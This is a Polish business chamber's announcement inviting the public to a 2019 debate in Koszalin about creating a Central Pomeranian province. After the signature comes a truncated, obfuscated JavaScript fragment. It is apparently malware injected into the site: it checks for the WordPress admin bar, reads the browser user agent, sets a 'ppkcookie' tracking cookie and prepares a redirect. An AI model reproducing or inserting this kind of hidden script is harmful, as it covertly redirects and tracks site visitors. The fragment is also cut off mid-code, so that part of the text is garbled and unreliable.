Debata Środkowopomorska | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo!

Grupa organizacji biznesowych z regionu Pomorza Środkowego, w tym Północna Izba Gospodarcza w Koszalinie podejmuje kolejne działania w sprawie powołania Województwa Środkowopomorskiego. Zapraszamy do udziału w „Debacie Środkowopomorskiej”, która odbędzie się w dniu 2 października 2019 roku (środa) w godzinach 17.00 – 19.00 w sali Biblioteki Publicznej w Koszalinie przy Placu Polonii 1. Debata ma charakter otwarty, zapraszamy wszystkich mieszkańców regionu.

Celem Debaty jest dyskusja dotycząca wspólnych działań na rzecz umocnienia społeczno – gospodarczego Regionu Pomorza Środkowego poprzez utworzenie Województwa Środkowopomorskiego w IX Kadencji Sejmu Rzeczypospolitej Polskiej. W Debacie udział wezmą Kandydaci na Posła na Sejm RP IX Kadencji z Regionu Pomorza Środkowego będący zwolennikami jego utworzenia. W harmonogramie wydarzenia uwzględniliśmy zarówno wystąpienia kandydatów, jak i pytania z widowni. Debatę poprowadzi red. Andrzej Rudnik.

Działania w tej sprawie ponowiliśmy z początkiem 2016 roku angażując w nie organizacje biznesowe w regionie oraz przedsiębiorców. Do tej pory wielokrotnie interpelowaliśmy w tej sprawie do polityków, na szczeblu lokalnym oraz centralnym wysyłając zapytania do Pani Premier Beaty Szydło i Pana Premiera Mateusza Morawickiego, do właściwych Ministrów i Posłów. Popierając nasze stanowisko nie tylko historycznymi obietnicami przez nich składanymi, ale i argumentami ekonomicznymi, które zawarliśmy we wcześniej przedstawianym opracowaniu. Wynikami ankiety przeprowadzonej wśród przedsiębiorców, którzy opowiedzieli się za powołaniem nowego województwa. Wieloma działaniami informacyjnymi dla mieszkańców regionu, debatą i naukową konferencją tematyczną.

Zapraszamy Państwa do udziału w Debacie, śledzenia i zaangażowania w sprawię powołania Województwa Środkowopomorskiego.

 

Z poważaniem

Roman Biłas
Prezes Północnej Izby Gospodarczej
Oddział w Koszalinie 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m